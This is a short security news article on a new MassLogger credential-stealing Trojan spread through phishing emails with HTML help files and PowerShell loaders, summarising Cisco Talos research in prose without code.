New version of MassLogger Trojan detected in phishing campaign

Cybersecurity experts reported the detection of a new version of MassLogger, a dangerous Trojan used for credential theft through phishing campaigns in Chrome, Outlook, messaging apps and other platforms.

Researchers report that this new iteration is sent to Windows system users via an HTML file format, which is used for system help files under normal conditions. These formats may also include some fragments of JavaScript scripts, which hackers take advantage of to deploy an attack. This campaign was reported by Cisco Talos specialists in mid-January 2021.

The main focus of activity has been detected in some countries in Europe, including Spain, Italy, Russia and Turkey. In the detected attacks it was discovered that MassLogger hides your malicious RAR files by initiating the infection, which helps hackers avoid security mechanisms on the target system. This is a feature recently added to the Trojan.

MassLogger operators employ a multimodular approach that starts with the deployment of the phishing campaign and extends to the removal of a final payload. While these are complex techniques, this could also be an advantage for researchers, who could disrupt the chain of attack.

Phishing emails used by hackers contain legitimate-looking subject lines to trick users. Messages are embedded with disused JavaScript code to create an HTML page, which contains a PowerShell download that establishes a connection to a legitimate server and retrieves the loader to start the MassLogger payload. 

About malware, experts mention that MassLogger is an espionage software that can extract user credentials from multiple platforms, including Chrome and Outlook. The new variant is based on .NET, which can make static analysis difficult. Although initially detected almost a year ago, the new variant is much more powerful as malware authors have successfully redesigned it to evade detection.

In this campaign, in addition to exfiltrating data via FTP, SMTP or HTTP, MassLogger v3.0.7563.31381 contains additional functionality for the theft of credentials from platforms such as Discord, Firefox, Chrome, Edge, Brave, among other services. This malware can also be configured as a keylogger, but this functionality has not been identified in this campaign.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) website.